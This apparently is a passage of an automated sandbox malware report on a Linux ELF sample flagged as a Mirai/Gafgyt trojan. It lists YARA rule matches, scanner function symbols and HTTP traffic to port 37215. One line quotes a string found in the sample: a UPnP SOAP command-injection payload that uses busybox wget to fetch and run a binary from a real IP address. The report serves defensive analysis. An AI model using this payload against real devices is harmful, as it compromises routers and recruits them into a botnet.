                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b Author: unknown
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f Author: unknown
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 Author: unknown
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 Author: unknown
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5498, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5499, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5501, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5503, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5505, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: ELF static info symbol of initial sampleName: vseattack
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huawei_scanner.c
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_fake_time
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_get_random_ip
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_recv_strip_null
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_rsck
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_rsck_out
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_scanner_init
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_scanner_kill
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_scanner_pid
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_scanner_rawpkt
                Source: hj3msRLZgi.elfELF static info symbol of initial sample: huaweiscanner_setup_connection
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
                Source: hj3msRLZgi.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
                Source: 5498.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
                Source: 5505.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
                Source: 5499.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
                Source: 5503.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_c573932b reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 18a3025ebb8af46605970ee8d7d18214854b86200001d576553e102cb71df266, id = c573932b-9b3f-4ab7-a6b6-32dcc7473790, last_modified = 2021-09-16
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_7167d08f reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = b9df4ab322a2a329168f684b07b7b05ee3d03165c5b9050a4710eae7aeca6cd9, id = 7167d08f-bfeb-4d78-9783-3a1df2ef0ed3, last_modified = 2021-09-16
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
                Source: 5501.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5498, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5499, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5501, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5503, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: hj3msRLZgi.elf PID: 5505, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: classification engineClassification label: mal100.spre.troj.linELF@0/0@2/0

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: unknownNetwork traffic detected: HTTP traffic on port 42152 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41766 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44308 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48390 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33534 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48242 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51456 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48092 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42714 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44950 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52254 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46224 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 36432 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38014 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44796 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56634 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 34334 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 44826 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40200 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48698 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53984 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53186 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45986 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48094 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52526 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46264 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48308 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52628 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 42150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 59112 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60186 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35988 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54966 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38104 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33966 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51980 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35038 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37936 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57034 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55210 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 55782 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46730 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 39392 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 45438 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46274 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46970 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35740 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 52952 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58554 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37748 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 32894 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47910 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33150 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 51920 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 38556 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 33748 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 57648 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 41208 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 60112 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53058 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 54522 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 43196 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47124 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37946 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58950 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56152 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53572 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53602 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 46510 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 40518 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 56660 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 48532 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 47582 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58190 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 58632 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 37358 -> 37215
